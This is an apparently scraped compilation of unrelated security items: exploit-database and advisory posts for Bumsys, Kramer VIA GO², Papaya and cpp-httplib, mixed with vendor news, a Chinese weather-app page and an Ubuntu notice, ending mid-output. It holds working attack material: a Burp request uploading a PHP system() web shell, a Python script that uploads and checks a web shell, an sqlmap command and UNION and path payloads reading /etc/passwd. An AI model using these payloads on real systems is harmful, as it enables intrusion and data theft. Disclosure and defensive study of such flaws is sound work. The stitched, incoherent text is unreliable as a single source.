Bumsys Business Management System version 1.0.3-beta suffers from a remote shell upload vulnerability.

Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload  
Google Dork : NA  
Date: 19-01-2023  
Exploit Author: AFFAN AHMED  
Vendor Homepage: https://github.com/unilogies/bumsys  
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip  
Version: 1.0.3-beta  
Tested on: Windows 11, XAMPP-8.2.0  
CVE : CVE-2023-0455

================================  
Steps_TO_Reproduce  
================================  
- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)  
- Click on action button to edit the Profile  
- Click on select logo button to upload the image  
- Intercept the POST Request  and do the below changes .

================================================================  
Burpsuite-Request  
================================================================  
POST /xhr/?module=settings&page=updateShop HTTP/1.1  
Host: demo.bumsys.org  
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7  
Content-Length: 1280  
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"  
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA  
Accept: */*  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://demo.bumsys.org  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.bumsys.org/settings/shop-list/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopName"

TEST  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopAddress"

 test   
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCity"

testcity  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopState"

teststate  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPostalCode"

700056  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCountry"

testIND  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPhone"

895623122  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopEmail"

test@gmail.com  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopInvoiceFooter"

 ------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"  
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>

====================================================================================  
Burpsuite-Response  
====================================================================================  
HTTP/1.1 200 OK  
Date: Thu, 19 Jan 2023 07:14:26 GMT  
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips  
X-Powered-By: PHP/7.0.33  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>

====================================================================================

VIDEO-POC : https://youtu.be/nwxIoSlyllQ

Bumsys Business Management System 1.0.3-beta Shell Upload

Categories: Exploits and vulnerabilities
Categories: News
Tags: Apple

Tags:  macOS

Tags:  Ventura 13.4

Tags:  Monterey 12.6.6

Tags:  Big Sur 11.7.7

Tags:  libxpc

Tags:  SIP

Tags:  XPC

Tags:  NVRAM

Tags:  CVE-2023-32369

Tags:  Migraine

Microsoft has released details about a vulnerability that can bypass macOS's System Integrity Protection



(Read more...)




The post Microsoft gives Apple a migraine appeared first on Malwarebytes Labs.

On May 18, 2023, Apple published security content for macOS Ventura 13.4, macOS Monterey 12.6.6, and macOS Big Sur 11.7.7 that addressed a logic issue in libxpc.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE we are going to discuss is listed as CVE-2023-32369, which allows an app to modify protected parts of the macOS file system.

At the time there were no other details provided. This is usual and done to give users ample time to implement the necessary patches. But now Microsoft has published a blogpost that provides details about the vulnerability and how it was discovered during a routine malware hunt.

The updates may already have reached you in your regular update routines, but it doesn't hurt to check if your device is at the latest update level. If not, you can follow the instructions on how to update macOS on Mac.

**libxpc** is a closed source project that is part of XPC, which is the enhanced inter-process communication (IPC) framework used in macOS/iOS. In computer science, IPC refers specifically to the mechanisms an operating system provides to allow processes to manage shared data.

One of the security related functions of **libxpc** is System Integrity Protection (SIP). SIP is a security technology designed to help prevent potentially malicious software from modifying protected files and folders on your Mac. System Integrity Protection restricts the root user account and limits the actions that the root user can perform on protected parts of the Mac operating system. SIP is enabled by default on all modern macOS software releases.

This means that only certain processes—signed by Apple—have special entitlements to write to protected parts of macOS. This includes things like Apple software updates and Apple installers.

The Microsoft security engineers that are credited in the Apple security content however, found a flaw that allowed attackers with root permissions to add a malicious payload to SIP's exclusions list and launch it. Because they managed to pull this off by abusing the macOS Migration Assistant utility, they named the vulnerability Migraine.

Successfully exploiting this vulnerability would allow an attacker that had somehow managed to obtain root privileges to install a rootkit which would be protected by SIP. SIP can only be disabled by following this procedure:

1.  Restart your system in Recovery mode.
2.  Launch Terminal from the Utilities menu.
3.  Run the command _csrutil disable_.
4.  Restart your system.

Because SIP is controlled through the Mac’s NVRAM, enabling or disabling SIP affects all versions of the Mac operating system that are installed on the system. NVRAM (nonvolatile random-access memory) is a small amount of memory that your Mac uses to store certain settings and access them quickly.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Microsoft gives Apple a migraine

By Habiba Rashid
According to Bitdefender, GravityZone Security for Mobile is a cutting-edge solution that leverages powerful antimalware technologies driven by real-time threat intelligence and machine learning.
This is a post from HackRead.com Read the original post: Bitdefender Introduces GravityZone Security for Android, iOS, and Chromebook

Bitdefender has launched GravityZone Security for Mobile, a next-generation mobile security solution designed to provide organizations with advanced Mobile Threat Detection (MTD) and robust security measures for Android, iOS, and Chromebook devices.

From communication and banking to entertainment and productivity, smartphones have become integral to our daily lives. However, this increasing reliance on mobile devices has also made them lucrative targets for cybercriminals.

According to the 2023 “Market Guide for Mobile Threat Defense” report by Gartner®, recent cyber attacks have shown the involvement of mobile devices at various stages, emphasizing the critical need for advanced mobile threat detection solutions.

**Bitdefender Introduces GravityZone Security**

Bitdefender’s GravityZone Security for Mobile is a cutting-edge solution that leverages powerful antimalware technologies driven by real-time threat intelligence and machine learning.

This unique combination enables the detection and mitigation of both known and unknown mobile threats. By providing application vetting, device status monitoring, and protection against malicious apps and phishing attacks, GravityZone Security for Mobile significantly enhances the overall security posture of mobile devices.

**Proactively Defending Against Network-Based Threats**

One major vulnerability faced by mobile phones is network-based threats. GravityZone Security for Mobile helps organizations detect and respond to these threats, including reconnaissance attempts and man-in-the-middle attacks. By mapping tactics and techniques used in security evaluations, this solution offers a proactive defence against sophisticated attacks specifically targeted at the mobile channel.

**Comprehensive Device Assessments for Strengthening Mobile Security**

Mobile device vulnerabilities pose significant risks to organizations. GravityZone Security for Mobile conducts comprehensive device assessments, monitoring for missing encryption, jailbreaking, root access, and outdated devices. This proactive approach enables organizations to identify and address vulnerabilities promptly, bolstering their mobile security.

**Seamless Integration and Centralized Management**

Integration with existing security solutions is vital for comprehensive protection. GravityZone Security for Mobile seamlessly integrates with the unified Bitdefender GravityZone console, allowing organizations to manage mobile security alongside other endpoint security solutions. This integration extends security beyond traditional endpoints, simplifying the overall security infrastructure and enabling centralized management.

**Cloud-Based and User-Friendly Approach**

With a cloud-based and user-friendly approach, GravityZone Security for Mobile ensures easy deployment and management for organizations with mobile workforces. Its zero-touch enrollment feature streamlines mass deployments of mobile devices, enhancing security without burdening end-users.

**Meeting Regulatory Compliance Standards**

Regulatory compliance is a top concern for organizations in regulated industries. GravityZone Security for Mobile provides real-time visibility, enabling application vetting, detecting abnormal app behaviour, and enforcing application version control. By facilitating user warnings, isolating risky applications, and taking necessary actions, organizations can meet privacy and security standards more effectively.

**Conclusion:**

As the mobile threat landscape continues to evolve, organizations must enhance their mobile phone security. Bitdefender’s GravityZone Security for Mobile offers a comprehensive solution that effectively tackles mobile threats head-on.

By leveraging advanced technology, proactive defense mechanisms, and seamless integration, organizations can ensure the security and privacy of their mobile devices, safeguarding their operations from evolving cyber threats.

**RELATED ARTICLES**

1.  Ankr Launches Chainscanner Blockchain Explorer Tool
2.  Memcyco Introduces Real-Time Solution to Combat Brandjacking
3.  Mobile Security Firm Cirotta Launches Anti-Hacking Phone Cases
4.  ProtonVPN launches extensions for Chrome and Firefox browsers
5.  Microsoft launches Linux memory forensics tool to detect malware

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Bitdefender Introduces GravityZone Security for Android, iOS, and Chromebook

Plus: Microsoft patches two zero-day flaws, Google’s Android and Chrome get some much-needed updates, and more.

Apple, Google, and Microsoft have released major patches this month to fix multiple security flaws already being used in attacks. May was also a critical month for enterprise software, with GitLab, SAP, and Cisco releasing fixes for multiple bugs in their products.

Here’s everything you need to know about the security updates released in May.

Apple iOS and iPadOS 16.5

Apple has released its long-awaited point update iOS 16.5, addressing 39 issues, three of which are already being exploited in real-life attacks. The iOS upgrade patches vulnerabilities in the Kernel at the heart of the operating system and in WebKit, the engine that powers the Safari browser. The three already exploited flaws are among five fixed in WebKit—tracked as CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373.

CVE-2023-32409 is an issue that could allow an attacker to break out of the Web Content sandbox remotely, reported by Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International’s Security Lab. CVE-2023-28204 is a flaw that risks a user disclosing sensitive information. Finally, CVE-2023-32373 is a use-after-free bug that could enable arbitrary code execution.

Earlier in the month, Apple released iOS 16.4.1 (a) and iPadOS 16.4.1 (a)—the iPhone maker’s first-ever Rapid Security Response update—fixing the latter two exploited WebKit vulnerabilities also patched in iOS 16.5.

Apple iOS and iPadOS 16.5 were issued alongside iOS 15.7.6 and iPadOS 15.7.6 for older iPhones, as well as iTunes 12.12.9 for Windows, Safari 16.5, macOS Big Sur 11.7.7, macOS Ventura 13.4, and macOS Monterey 12.6.6.

Apple also released its first security update for Beats and AirPods headphones.

Microsoft

Microsoft’s mid-month Patch Tuesday fixed 40 security issues, two of which were zero-day flaws already being used in attacks. The first zero-day vulnerability, CVE-2023-29336, is an elevation-of-privilege bug in the Win32k driver that could allow an attacker to gain System privileges.

The second serious flaw, CVE-2023-24932, is a Secure Boot security feature bypass issue that could allow a privileged attacker to execute code. “An attacker who successfully exploited this vulnerability could bypass Secure Boot,” Microsoft said, adding that the flaw is difficult to exploit: “Successful exploitation of this vulnerability requires an attacker to compromise admin credentials on the device.”

The security update is not a full fix: It addresses the vulnerability by updating the Windows Boot Manager, which could cause issues, the company warned. Additional steps are required at this time to mitigate the vulnerability, Microsoft said, pointing to steps affected users can take to mitigate the issue.

Google Android

Google has released its latest Android security patches, fixing 40 flaws, including an already exploited Kernel vulnerability. The updates also include fixes for issues in the Android Framework, System, Kernel, MediaTek, Unisoc, and Qualcomm components.

The most severe of these issues is a high-severity security vulnerability in the Framework component that could lead to local escalation of privilege, Google said, adding that user interaction is needed for exploitation.

Previously linked to commercial spyware vendors, CVE-2023-0266 is a Kernel issue that could lead to local escalation of privilege. User interaction is not needed for exploitation.

Apple's iOS 16.5 Fixes 3 Security Bugs Already Used in Attacks

Cybersecurity researchers have found "backdoor-like behavior" within Gigabyte systems, which they say enables the UEFI firmware of the devices to drop a Windows executable and retrieve updates in an unsecure format.
Firmware security firm Eclypsium said it first detected the anomaly in April 2023. Gigabyte has since acknowledged and addressed the issue.
"Most Gigabyte firmware includes a Windows

Firmware Security / Vulnerability

Cybersecurity researchers have found "backdoor-like behavior" within Gigabyte systems, which they say enables the UEFI firmware of the devices to drop a Windows executable and retrieve updates in an unsecure format.

Firmware security firm Eclypsium said it first detected the anomaly in April 2023. Gigabyte has since acknowledged and addressed the issue.

"Most Gigabyte firmware includes a Windows Native Binary executable embedded inside of the UEFI firmware," John Loucaides, senior vice president of strategy at Eclypsium, told The Hacker News.

"The detected Windows executable is dropped to disk and executed as part of the Windows startup process, similar to the LoJack double agent attack. This executable then downloads and runs additional binaries via insecure methods."

"Only the intention of the author can distinguish this sort of vulnerability from a malicious backdoor," Loucaides added.

The executable, per Eclypsium, is embedded into UEFI firmware and written to disk by firmware as part of the system boot process and subsequently launched as an update service.

The .NET-based application, for its part, is configured to download and execute a payload from Gigabyte update servers over plain HTTP, thereby exposing the process to adversary-in-the-middle (AitM) attacks via a compromised router.

Loucaides said the software “seems to have been intended as a legitimate update application,” noting the issue potentially impacts “around 364 Gigabyte systems with a rough estimate of 7 million devices.”

With threat actors constantly on the lookout for ways to remain undetected and leave a minimal intrusion footprint, vulnerabilities in the privileged firmware update mechanism could pave the way for stealthy firmware implants that can subvert all security controls running in the operating system plane.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

To make matters worse, since the UEFI code resides on the motherboard, malware injected to the firmware can persist even if drives are wiped and the operating system is reinstalled.

Organizations are advised to apply the latest firmware updates to minimize potential risks. It's also advised to inspect and disable the "APP Center Download & Install" feature in UEFI/BIOS Setup and set a BIOS password to deter malicious changes.

"Firmware updates have notoriously low uptake with end users," Loucaides said. "Therefore, it is easy to understand thinking that an update application in firmware may help."

"However, the irony of a highly insecure update application, backed into firmware to automatically download and run a payload, is not lost."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Firmware Backdoor in Gigabyte Systems Exposes ~7 Million Devices

KramerAV VIA GO² < 4.0.1.1326 is vulnerable to Unauthenticated arbitrary file read.

**Introduction**

Kramer VIA GO² devices were vulnerable to multiple issues, including:

*   Unauthenticated arbitrary file read (CVE-2023-33507)
*   Unauthenticated SQLi (Squeely) (CVE-2023-33509)
*   Unauthenticated file upload resulting in RCE (CVE-2023-33508)

By chaining with previously discovered privilege escalation through misconfigured Sudo rules (CVE-2021-35064), it was possible to completely take over a device from an unauthenticated standpoint.

Throughout the disclosure process, Kramer have been exceedingly helpful and responsive. They were quick to confirm the issues and release a patch that fully resolves the issues.

**What is a Kramer VIA GO²?**

> VIA GO² gives iOS, Android, Chromebook, PC, and Mac users instant wireless connectivity with 4K advanced presentation capabilities. Kramer’s new VIA 4.0 is all about the end user. The new VIA application UI is intuitive, user-friendly and much easier to use. VIA 4.0 enables any user, including guests, to easily and securely connect and automatically disconnect at the end of the session.

After finding a device with default credentials (su:supass), it was discovered that it was possible to upload a font with an arbitrary extension and no content restrictions. This meant it was possible to upload a font which is actually a PHP script with the extension .php. Once the path on disk was found, visiting directly in a browser would execute the PHP file and allow a user to perform commands on the underlying operating system. From there, we created a dump of the available web application/PHP source code. The code was protected using IONCube, however this was bypassed using commonly available tools such as easytoyou.eu.

Available handlers were reviewed for issues and the three high severity vulnerabilities were discovered. It is likely that there are more within the codebase, and our audit of the code was in no way exhaustive.

After reviewing the latest firmware for these devices (4.0.1.1326), we noted that the handlers were _not_ included with the Debian package. The file runpkg.sh, which is run as part of the update process, contained the following commands:

    ...
    rm -rf /var/www/html/downloadRecording.php
    rm -rf /var/www/html/downloadMedia.php
    rm -rf /var/www/html/UploadWallpaper.php
    ...
    

This indicates that these endpoints should be removed by a firmware update.

While the firmware itself is password protected, simply by decoding the source code the decryption password was discovered.

**Proofs of concepts****Unauthenticated file read (CVE-2023-33507)**

The following endpoint allowed for the contents of arbitrary files on the file system to be retrieved:

*   http://XXX/downloadRecording.php?file=/etc/passwd

**Unauthenticated SQLi (CVE-2023-33509)**

This could be exploited with the following sqlmap command:

    sqlmap -u 'https://XXX/downloadMedia.php?medId=*' --dbms mysql --risk 3 --level 5 --technique B --threads 10
    

As an added bonus, the contents of arbitrary files could be obtained with the following payload:

*   https://XXX/downloadMedia.php?medId=-1+UNION+SELECT+"/../../../../etc/passwd"

**Unauthenticated RCE via File Upload (CVE-2023-33508)**

This issue can quickly be identified by attempting to access the endpoint:

*   http://XXX/UploadWallpaper.php

If this handler returns the message “Please enter the image to upload” it is very likely to be vulnerable.

The following Python payload can be used to obtain RCE:

    import requests
    import sys
    from urllib3.exceptions import InsecureRequestWarning
    
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    
    SHELL = '<html><head><title>babyshell</title></head><body><pre><?php echo $_REQUEST["cmd"]; ?></pre><br/><pre><?php echo system($_REQUEST["cmd"]); ?></pre></body></html>'
    
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target.com|1.2.3.4>")
        exit(1)
    
    target = sys.argv[1]
    
    url = f'https://{target}/UploadWallpaper.php'
    
    print("Uploading shell")
    
    resp = requests.post(url, files={'data': ('zx.php', SHELL)}, verify=False)
    
    if "Image added sucessfull" not in resp.text:
        print("Shell failed to upload")
        exit(1)
    
    print("Shell uploaded. Checking shell")
    
    url = f"https://{target}/uploads/large/zx.php"
    resp = requests.get(url, verify=False)
    if "Minishell" not in resp.text:
        print("Shell failed")
        exit(1)
    
    print("Shell available at:", url)
    

**Potential Impact**

Complete device compromise is possible, either via the RCE or obtaining user passwords via the Squeely.

**How to Fix It**

First update to version 4.0, then apply version 4.0.1.1326 or later.

**Vulnerability Disclosure Timeline:**

*   21/02/2023 Disclosed issue to CERT NZ
*   09/03/2023 Response from Vendor
*   17/03/2023 Vendor released patched firmware to ZX. ZX identified that the patch removes the vulnerable endpoints.
*   31/05/2023 CVEs assigned

CVE-2023-33507: Kramer VIA GO² - ZX Security

An issue found in BestWeather v.7.3.1 for Android allows unauthorized apps to cause an escalation of privileges attack by manipulating the database.

下载Android版 下载iOS版

下载Android版 下载iOS版

 

分钟级降水预报

穿衣提醒动画 出行提醒

 

360小时逐小时预报

未来90天预报 20多种生活指数

 

360小时逐小时预报

未来90天预报 20多种生活指数

移动互联网行业最具发展潜力奖

“双微一端”百佳评选—APP用户服务十佳账号

年度最佳天气类APP

“便捷生活”类绿色应用

中国互联协会会员

 

全场景覆盖 专业级天气服务

移动互联网行业最具发展潜力奖

“双微一端”百佳评选—APP用户服务十佳账号

年度最佳天气类APP

“便捷生活”类绿色应用

中国互联协会会员

 

应用名称：最美天气

开发者：最美天气（上海）科技有限公司

沪ICP备19025942号-2

权限详情 隐私政策

应用名称：最美天气

开发者：最美天气（上海）科技有限公司

沪ICP备19025942号-2

权限详情 隐私政策

CVE-2023-29741: 最美天气

Papaya Medical Viewer version 1.0 suffers from a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Title  
=====

SCHUTZWERK-SA-2022-001: Cross-Site-Scripting in Papaya Medical Viewer

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2023-33255

Link  
====

https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2022-001/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2022-001.txt

Further SCHUTZWERK advisories:  
https://www.schutzwerk.com/blog/tags/advisories/

Affected products/vendor  
========================

Papaya, Research Imaging Institute - University of Texas Health Science   
Center

Summary  
=======

User supplied input in the form of DICOM or NIFTI images can be loaded   
into the  
Papaya web application without any kind of sanitization. This allows to   
inject  
arbitrary JavaScript code into the image's metadata which will in   
consequence be  
executed as soon as the metadata is displayed in the Papaya web application.

Risk  
====

The vulnerability allows an attacker to inject arbitrary JavaScript code   
into  
the Papaya web application. A risk calculation highly depends on how the   
Papaya  
software is used as a library in the context of a bigger medical web  
application. During the discovery of this vulnerability, the web application  
which used Papaya allowed to upload and store corresponding images on   
the web  
server and display them to multiple users. It was therefore possible to   
store  
JavaScript code on the server and attack users to impersonate or steal their  
session, leading to a disclosure of sensitive medical data.

Description  
===========

A medical web application assessed for security vulnerabilities by   
SCHUTZWERK  
was found to contain a stored cross-site-scripting vulnerability. The  
application uses the Papaya JavaScript software[0] published by the Research  
Imaging Institute belonging to the University of Texas Health Science   
Center[1].

The software is described as "[..] a pure JavaScript medical research image  
viewer, supporting DICOM and NIFTI formats, compatible across a range of web  
browsers [..]". It can be used stand-alone or integrated into larger medical  
applications, has 192 forks and 488 stars on GitHub and was used in at   
least 50  
published academic research papers[2].

One of the main features is to open medical images of multiple formats,   
which  
can be achieved via the context menu "File - Add image...". Papaya then   
displays  
the image and adds a new icon in the upper right corner of the viewer.   
This icon  
allows to open another context menu to edit the previous opened image as   
a layer  
in multiple ways. The option of interest for the cross-site-scripting  
vulnerability is the "Show Header" entry, which allows getting further  
information about the medical image.

An example DICOM[3] zip archive was downloaded[4], extracted and opened in  
Papaya. The "Show Header" function shows multiple entries including private  
patient data fields like patient ID, name, date of birth and gender.

The DICOM ToolKit (DCMTK)[5] offers multiple tools to analyze, create   
and edit  
DICOM images. The metadata field "Manufacturer" of the previously downloaded  
DICOM image was edited with help of the DCMTK tool dcmodify:

DICTPATH=/tmp/share/dcmtk/dicom.dic dcmodify -m  
"Manufacturer=<script>alert(1)</script>" 2_skull_ct/DICOM/I0

The DCMTK tool dcmdump can be used to verify the manipulated metadata entry:

dcmdump 2_skull_ct/DICOM/I0

[..]  
# Dicom-Data-Set  
[..] (0008,0070) LO [<script>alert(1)</script>]              #  26, 1   
Unknown  
Tag & Data [..]

Viewing the header information of the manipulated DICOM image in Papaya   
executes  
the injected JavaScript code in the web browser.

SCHUTZWERK decided to publish the still existing vulnerability (commit   
4a42701),  
since the vendor did not implement any remediation several months after new  
contributors have been introduced to the project.

Solution/Mitigation  
===================

Several mitigation recommendations have been sent to the vendor. These   
include  
common mitigation strategies from OWASP[6], like escaping user   
controlled input  
and the usage of popular JavaScript libraries like DomPurify[7].

As a quick workaround, the context menu, which allows showing header   
information  
can be disabled by setting the variable kioskMode to true.

Disclosure timeline  
===================

2020-08-20: Vulnerability discovered 2020-08-20: Vulnerability reported to  
             vendor  
2020-09-30: Contacted vendor again  
2020-09-30: Vendor responds and asks for mitigation ideas  
2020-10-01: Response to vendor with detailed information and mitigation   
ideas  
2020-11-09: Contacted vendor again for any status updates  
2022-08-30: Retest of the customer application including the Papaya web  
             application  
2022-09-21: Notified vendor of intention to publish advisory  
2022-10-18: Vendor notified SCHUTZWERK of new contributors who will   
maintain the  
             project  
2023-04-19: Informed vendor about publication deadline on May 15, 2023  
2023-05-08: Vendor replied with intention to fix vulnerability until May   
15,2023  
2023-05-15: Vulnerability fixed by vendor  
2023-05-26: Advisory published by SCHUTZWERK

Contact/Credits  
===============

The vulnerability was discovered during an assessment by Lennert Preuth of  
SCHUTZWERK GmbH.

References  
==========

[0] https://github.com/rii-mango/Papaya  
[1] https://rii.uthscsa.edu/  
[2] http://mangoviewer.com/pubs.html  
[3] https://en.wikipedia.org/wiki/DICOM  
[4] https://medimodel.com/sample-dicom-files/human_skull_2_dicom_file/  
[5] https://dicom.offis.de/dcmtk.php.de  
[6] https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_  
     Prevention_Cheat_Sheet.html  
[7] https://github.com/cure53/DOMPurify

Disclaimer  
==========

The information in this security advisory is provided "as is" and without  
warranty of any kind. Details of this security advisory may be updated   
in order  
to provide as accurate information as possible. The most recent version   
of this  
security advisory can be found at SCHUTZWERK GmbH's website.  
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmRwkEgaHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrvCEA//YsP7ZUvk9VLzp49DtsMP  
HQF0ojoBmNZOi5fymVDRGScmMT5VLOsdp9EUEywPYxmxo1rPc4vv6gM3hQsQ7TRO  
oAb9ZeZjvYy2Nyz6cy3wX4H2naFOHEr085Uwpg9pX5DAHkQVsseTi/n04u5PT5xP  
Fnuozie/KOG4pmkkKFHmG6aWgUSXWZuq8japOghl6g35BmG7ntXG2OYsb7f5ITYw  
ksRbJt+8wetrBsa/pR6ZfEkoEpyuFZg85EDpDRoBPVlGZtuSF6dh+WfO+9VQBjLE  
dZwPRaXefHp/v89rEfWvkX3JGmGWh6P8KQ+puF3GHLcBa8iDIbW/HPfQHGuGhfIa  
upZ1E+HtgpxInxelM/BcFKXSjD4AMnAULa2C6nWsdmw8GIKHHus+WQuK1z40R7N4  
Vji59buH9SBWAWb7MuyRrdxoZSmAuxcR7lXVzHMxSOZm0W7J0d9luLL8XUn4kj8+  
tRE24TgbdGyAYr/V6BO9RiYCtyWPji5VBtwFZLFlvKRo81zyS9nve651nWS7Fv/l  
OGns4fGbEZ+sm/YuFdfyzg8TMJ0pqV0AswCnx9mSqWn3RRBHg55pE4i6IyUdofu/  
eiaTl33oyGolW7rQ5ATtmsOgKp5jKb7rt3WVSBLn1D9+JJ8MfbDrvyUoTkIZaqEp  
4bKAQKWvxQG8GpbKuQT4on0=  
=IEuk  
-----END PGP SIGNATURE-----

--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Papaya Medical Viewer 1.0 Cross Site Scripting

Ubuntu Security Notice 6111-1 - It was discovered that Flask incorrectly handled certain data responses. An attacker could possibly use this issue to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6111-1  
May 29, 2023

flask vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Flask could be made to expose sensitive information in certain scenarios.

Software Description:  
- flask: Micro web framework based on Werkzeug and Jinja2

Details:

It was discovered that Flask incorrectly handled certain data responses.  
An attacker could possibly use this issue to expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  python3-flask                   2.2.2-2ubuntu1.1

Ubuntu 22.10:  
  python3-flask                   2.0.3-1ubuntu1.1

Ubuntu 22.04 LTS:  
  python3-flask                   2.0.1-2ubuntu1.1

Ubuntu 20.04 LTS:  
  python3-flask                   1.1.1-2ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6111-1  
  CVE-2023-30861

Package Information:  
  https://launchpad.net/ubuntu/+source/flask/2.2.2-2ubuntu1.1  
  https://launchpad.net/ubuntu/+source/flask/2.0.3-1ubuntu1.1  
  https://launchpad.net/ubuntu/+source/flask/2.0.1-2ubuntu1.1  
  https://launchpad.net/ubuntu/+source/flask/1.1.1-2ubuntu0.1

Ubuntu Security Notice USN-6111-1

Versions of the package yhirose/cpp-httplib before 0.12.4 are vulnerable to CRLF Injection when untrusted user input is used to set the content-type header in the HTTP .Patch, .Post, .Put and .Delete requests. This can lead to logical errors and other misbehaviors.**Note:** This issue is present due to an incomplete fix for [CVE-2020-11709](https://security.snyk.io/vuln/SNYK-UNMANAGED-YHIROSECPPHTTPLIB-2366507).

CRLF Injection in cpp-httplib@v0.12.3

**Information**

**Project:** cpp-httplib

**Tested Version:** v0.12.3 (commit f977558a28d6db893cf42131c33d025fa17458e1)

**Github Repository:** https://github.com/yhirose/cpp-httplib

**Details**

cpp-httplib is vulnerable to **CRLF Injection** when untrusted user input is used to set the content-type header in the HTTP .Patch, .Post, .Put and .Delete requests. An attacker can add the \r\n (carriage return line feeds) characters and inject additional headers in the request sent.

The fix introduced here (https://github.com/yhirose/cpp-httplib/commit/85327e19ae7e72028c30917247238d638ce56d0b) to check for CRLF characters is applied in the Request::set_header method but not in the following places:

*   https://github.com/yhirose/cpp-httplib/blob/f977558a28d6db893cf42131c33d025fa17458e1/httplib.h#L6738
*   https://github.com/yhirose/cpp-httplib/blob/f977558a28d6db893cf42131c33d025fa17458e1/httplib.h#L7427

More reference about this vulnerability and its impact:

*   https://owasp.org/www-community/vulnerabilities/CRLF\_Injection
*   https://cwe.mitre.org/data/definitions/113.html

Reference to similar issues affecting other projects:

*   https://security.snyk.io/vuln/SNYK-SWIFT-SWIFTSERVERASYNCHTTPCLIENT-3237994
*   https://security.snyk.io/vuln/SNYK-JS-UNDICI-2980276

**PoC**

*   download the project and extract in a folder
*   in the same folder of the downloaded project, create a server to log incoming requests and print headers:

g++ server\_log.cpp -o server\_log 
./server\_log

*   in the same folder of the downloaded project, create a client with headers containing CRLF sequences (in the PoC below the additional header evilX: helloX is sent):

g++ client.cpp -o client 
./client

Server output:

\================================
POST HTTP/1.1 /test1
Accept: \*/\*
Connection: close
Content-Length: 3
Content-Type: application/x-www-form-urlencoded
evil1: hello1
Host: 0.0.0.0:8080
LOCAL\_ADDR: 127.0.0.1
LOCAL\_PORT: 8080
REMOTE\_ADDR: 127.0.0.1
REMOTE\_PORT: 50972
User-Agent: cpp-httplib/0.12.3
================================
DELETE HTTP/1.1 /test2
Accept: \*/\*
Connection: close
Content-Length: 3
Content-Type: text/plain
evil2: hello2
Host: 0.0.0.0:8080
LOCAL\_ADDR: 127.0.0.1
